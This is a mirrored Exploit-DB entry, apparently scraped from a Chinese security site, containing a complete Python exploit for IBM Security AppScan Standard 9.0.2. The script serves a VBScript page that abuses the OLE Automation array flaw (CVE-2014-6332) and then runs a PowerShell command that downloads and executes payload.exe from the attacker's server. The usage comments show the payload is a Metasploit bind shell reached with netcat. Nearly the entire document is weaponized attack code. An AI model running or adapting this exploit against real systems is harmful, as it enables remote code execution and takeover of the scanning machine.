IBM Security AppScan Standard 9.0.2 – OLE Automation Array Remote Code Execution

  • 作者: Naser Farhadi
    日期: 2015-06-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/37163/
  • #!/usr/bin/python
    
    import BaseHTTPServer, socket
    
    ##
    # IBM Security AppScan Standard OLE Automation Array Remote Code Execution
    #
    # Author: Naser Farhadi
    # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
    #
    # Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7
    #
    # Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ 
    # if you able to exploit IE then you can exploit appscan and acunetix ;)
    # This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And
    # Metasploit windows/shell_bind_tcp Executable Payload
    #
    # Usage:
    # chmod +x appscan.py
    # ./appscan.py
    # ...
    # nc 172.20.10.14 333
    #
    # Video: http://youtu.be/hPs1zQaBLMU
    ##
    
    class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(req):
    req.send_response(200)
    if req.path == "/payload.exe":
    req.send_header('Content-type', 'application/exe')
    req.end_headers()
    exe = open("payload.exe", 'rb')
    req.wfile.write(exe.read())
    exe.close()
    else:
    req.send_header('Content-type', 'text/html')
    req.end_headers()
    req.wfile.write("""Please scan me!
    <SCRIPT LANGUAGE="VBScript">
    function runmumaa() 
    On Error Resume Next
    set shell=createobject("Shell.Application")
    command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe',\
    'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');"
    shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
    end function
    
    dim aa()
    dim ab()
    dim a0
    dim a1
    dim a2
    dim a3
    dim win9x
    dim intVersion
    dim rnda
    dim funclass
    dim myarray
    
    Begin()
    
    function Begin()
    On Error Resume Next
    info=Navigator.UserAgent
    
    if(instr(info,"Win64")>0) then
     exit function
    end if
    
    if (instr(info,"MSIE")>0) then 
     intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) 
    else
     exit function
     
    end if
    
    win9x=0
    
    BeginInit()
    If Create()=True Then
     myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
    
     if(intVersion<4) then
     document.write("<br> IE")
     document.write(intVersion)
     runshellcode()
     else
    setnotsafemode()
     end if
    end if
    end function
    
    function BeginInit()
     Randomize()
     redim aa(5)
     redim ab(5)
     a0=13+17*rnd(6)
     a3=7+3*rnd(5)
    end function
    
    function Create()
    On Error Resume Next
    dim i
    Create=False
    For i = 0 To 400
    If Over()=True Then
    ' document.write(i) 
     Create=True
     Exit For
    End If 
    Next
    end function
    
    sub testaa()
    end sub
    
    function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redimPreserve aa(a2)
    
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314
    
     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310
     mydata=aa(a1)
     redimPreserve aa(a0)
    end function 
    
    
    function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
    j=readmemo(i+&h120+k)
    if(j=14) then
    j=0
    redimPreserve aa(a2) 
     aa(a1+2)(i+&h11c+k)=ab(4)
    redimPreserve aa(a0)
    
     j=0 
    j=readmemo(i+&h120+k) 
     
     Exit for
     end if
    
    next 
    ab(2)=1.69759663316747E-313
    runmumaa() 
    end function
    
    function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
    
    redimPreserve aa(a0) 
    redim ab(a0) 
    
    redimPreserve aa(a2)
    
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
    
    If(IsObject(aa(a1-1)) = False) Then
     if(intVersion<4) then
     mem=cint(a0+1)*16 
     j=vartype(aa(a1-1))
     if((j=mem+4) or (j*8=mem+8)) then
    if(vartype(aa(a1-1))<>0)Then
     If(IsObject(aa(a1)) = False ) Then 
     type1=VarType(aa(a1))
     end if 
    end if
     else
     redimPreserve aa(a0)
     exitfunction
    
     end if 
    else
     if(vartype(aa(a1-1))<>0)Then
    If(IsObject(aa(a1)) = False ) Then
    type1=VarType(aa(a1))
    end if 
    end if
    end if
    end if
    
    
    If(type1=&h2f66) Then 
    Over=True
    End If
    If(type1=&hB9AD) Then
    Over=True
    win9x=1
    End If
    
    redimPreserve aa(a0)
    
    end function
    
    function ReadMemo(add) 
    On Error Resume Next
    redimPreserve aa(a2)
    
    ab(0)=0 
    aa(a1)=add+4 
    ab(0)=1.69759663316747E-313 
    ReadMemo=lenb(aa(a1))
     
    ab(0)=0
     
    redimPreserve aa(a0)
    end function
    
    </script>""")
    
    if __name__ == '__main__':
    sclass = BaseHTTPServer.HTTPServer
    server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
    print "Http server started", socket.gethostbyname(socket.gethostname()), 80
    try:
    server.serve_forever()
    except KeyboardInterrupt:
    pass
    server.server_close()